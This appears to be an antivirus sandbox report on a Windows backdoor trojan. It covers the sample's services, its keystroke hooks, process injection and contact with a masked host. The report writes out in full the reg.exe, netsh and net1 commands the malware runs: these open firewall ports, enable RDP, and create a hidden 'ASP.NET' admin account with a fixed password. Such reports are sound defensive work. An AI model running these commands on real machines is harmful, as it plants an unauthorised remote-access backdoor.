Technical Information
To ensure autorun and distribution:
Creates the following services:
- [<HKLM>\SYSTEM\ControlSet001\Services\PlugAndPlay] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\PlugAndPlay] 'ImagePath' = '%APPDATA%\svchost.exe -service -debug'
- [<HKLM>\SYSTEM\ControlSet001\Services\TestService] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
Malicious functions:
To bypass firewall, removes or modifies the following registry keys:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\mstsc.exe' = '<SYSTEM32>\mstsc.exe:*:Enabled:ENABLE'
Creates and executes the following:
- '%APPDATA%\lsass.exe'
Executes the following:
- '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_REGDWORD /d 3389 /f
- '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\services\PlugAndPlay" /v ImagePath /t REG_SZ /d "%APPDATA%\svchost.exe -service -debug" /f
- '<SYSTEM32>\reg.exe' ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN" /v iexplore.exe /t REG_REGDWORD /d 0 /f
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%APPDATA%\hvnc2.exe" ENABLE
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%APPDATA%\svchost.exe" ENABLE
- '<SYSTEM32>\sc.exe' create "PlugAndPlay" displayname= "PlugAndPlay " binpath= "%APPDATA%\svchost.exe -service -debug" type= own start= auto error= ignore
- '<SYSTEM32>\reg.exe' DELETE "HKLM\System\CurrentControlSet\Services\TermService\Parameters" /v "X509 Certificate" /f
- '<SYSTEM32>\net1.exe' accounts /maxpwage:unlimited
- '<SYSTEM32>\reg.exe' DELETE "HKLM\System\CurrentControlSet\Services\TermService\Parameters" /v "X509 Certificate ID" /f
- '<SYSTEM32>\reg.exe' ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 2500 /t REG_DWORD /d 3 /f
- '<SYSTEM32>\reg.exe' DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects" /f
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol = TCP port = 5900 name = TCP
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol = TCP port = 5800 name = TCP
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol = TCP port = 5931 name = TCP
- '<SYSTEM32>\sc.exe' stop TestService
- '<SYSTEM32>\sc.exe' start "PlugAndPlay"
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol = TCP port = 443 name = TCP
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol = TCP port = 3389 name = TCP
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "<SYSTEM32>\mstsc.exe" ENABLE
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol = TCP port = 31337 name = TCP
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol = TCP port = 8080 name = TCP
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol = TCP port = 80 name = TCP
- '<SYSTEM32>\reg.exe' DELETE "HKLM\System\CurrentControlSet\Services\TermService\Parameters" /v Certificate /f
- '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
- '<SYSTEM32>\net1.exe' start FastUserSwitchingCompatibility
- '<SYSTEM32>\mnmsrvc.exe'
- '<SYSTEM32>\sc.exe' start TestService
- '<SYSTEM32>\sc.exe' create "TestService" displayname= "HTTPS Service" binpath= "%APPDATA%\lsass.exe" type= own start= auto error= ignore
- '<SYSTEM32>\sc.exe' start mnmsrvc
- '<SYSTEM32>\sc.exe' Start TermService
- '<SYSTEM32>\sc.exe' Start TlntSvr
- '<SYSTEM32>\reg.exe' DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v GinaDLL /f
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s ASP.NET /add
- '<SYSTEM32>\net1.exe' localgroup "Пользователи удаленного рабочего стола" ASP.NET /add
- '<SYSTEM32>\net1.exe' localgroup "Remote Desktop Users" ASP.NET /add
- '<SYSTEM32>\reg.exe' DELETE "HKLM\SOFTWARE\Microsoft\MSLicensing\Store" /f
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ASP.NET /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f
- '<SYSTEM32>\net1.exe' start TermService
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 10 /f
- '<SYSTEM32>\net1.exe' user ASP.NET 7gti201hg /add /EXPIRES:NEVER /active:yes
- '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Services\TermService" /v Start /t REG_DWORD /d 2 /f
Injects code into
the following system processes:
- <SYSTEM32>\wbem\wmiprvse.exe
- %WINDIR%\Explorer.EXE
Installs hooks to intercept notifications
on keystrokes:
- Handler for all processes: %APPDATA%\core.dll
Modifies settings of Windows Internet Explorer:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '2500' = '00000003'
Modifies file system :
Creates the following files:
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\_hello[1].php
- %APPDATA%\core.dll
- %APPDATA%\lsass.exe
Sets the 'hidden' attribute to the following files:
- %APPDATA%\core.dll
- %APPDATA%\lsass.exe
Network activity:
Connects to:
- 'www.at##che.lt':80
- 'localhost':4455
TCP:
HTTP GET requests:
- www.at##che.lt/_hello.php?pa########################################################################################################################################################
- www.at##che.lt/
UDP:
- DNS ASK www.at##che.lt
